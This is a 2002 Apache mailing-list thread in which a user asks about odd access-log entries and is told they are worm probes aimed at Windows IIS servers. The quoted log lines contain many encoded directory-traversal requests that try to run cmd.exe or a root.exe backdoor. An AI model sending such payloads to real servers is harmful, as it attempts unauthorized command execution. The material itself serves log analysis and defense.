httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From eric.li...@t-online.de (eric)
Subject Re: Am I being probed?
Date Sun, 28 Jul 2002 16:53:12 GMT
Jack,

Thanks!

On Sunday 28 July 2002 18:01, Jack L. Stone wrote:
> At 06:03 PM 7.28.2002 +0200, eric wrote:
> >Greetings!
> >
> >I'm a newbie when it comes to many *nix things and Apache is one of them.
> >
> >I have two machines, one running Suse 8.0 and the other running WinME. 
> > Both of them are hooked up to a LinkSys EtherFast DSL router.  My Suse
> > box is running Apache 2.0.39.
> >
> >I use WinMe to connect to the web server.  It's address is 192.168.1.100
> > and the Suse box is 192.168.1.101.
> >
> >I was going through my Apache access log and found these entries:
> >
> >217.228.40.62 - - [27/Jul/2002:19:16:05 +0200] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:10 +0200] "GET /MSADC/root.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:15 +0200] "GET
> >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:21 +0200] "GET
> >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:27 +0200] "GET
> >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:32 +0200] "GET
> >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:38 +0200] "GET
> >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:44 +0200] "GET
> >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> >s
>
> ystem32/cmd.exe?/c+dir
>
> >HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:50 +0200] "GET
> >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:16:56 +0200] "GET
> >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:02 +0200] "GET
> >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:08 +0200] "GET
> >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:14 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.40.62 - - [27/Jul/2002:19:17:19 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.40.62 - - [27/Jul/2002:19:17:25 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.40.62 - - [27/Jul/2002:19:17:31 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >217.235.140.189 - - [27/Jul/2002:19:45:51 +0200] "GET
>
> /scripts/root.exe?/c+dir
>
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
> > /MSADC/root.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
> >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:52 +0200] "GET
> >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
> >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
> >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:53 +0200] "GET
> >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
> >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> >s
>
> ystem32/cmd.exe?/c+dir
>
> >HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
> >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:54 +0200] "GET
> >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET
> >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:55 +0200] "GET
> >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.235.140.189 - - [27/Jul/2002:19:45:56 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.235.140.189 - - [27/Jul/2002:19:45:57 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >217.228.92.217 - - [27/Jul/2002:20:30:53 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.92.217 - - [27/Jul/2002:20:30:54 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >217.228.92.217 - - [27/Jul/2002:20:30:56 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >217.228.92.217 - - [27/Jul/2002:20:30:57 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET
> > /scripts/root.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET /MSADC/root.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:50 +0200] "GET
> >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
> >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
> >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:51 +0200] "GET
> >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
> >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
> >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/
> >s
>
> ystem32/cmd.exe?/c+dir
>
> >HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:52 +0200] "GET
> >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
> >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
> >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:53 +0200] "GET
> >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
> >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
> >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 720
> >80.60.131.235 - - [28/Jul/2002:13:37:54 +0200] "GET
> >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >80.60.131.235 - - [28/Jul/2002:13:37:55 +0200] "GET
> >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 787
> >
> >
> >and there's a few more.
> >
> >What's going on here?  Is there anyway I can find out?  Should I bother?
> >Should I care?
> >
> >Thanks, Eric
>
> You would only need to care if you were running a WIN server... it is
> probably the "script kiddies" trying to wreak some havoc by trying to run
> their scripts (worm) on yours/any machine in its search on the net....
>
> Best regards,
> Jack L. Stone,
> Administrator
>
> SageOne Net
> http://www.sage-one.net
> jackstone@sage-one.net
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org


---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Mime
View raw message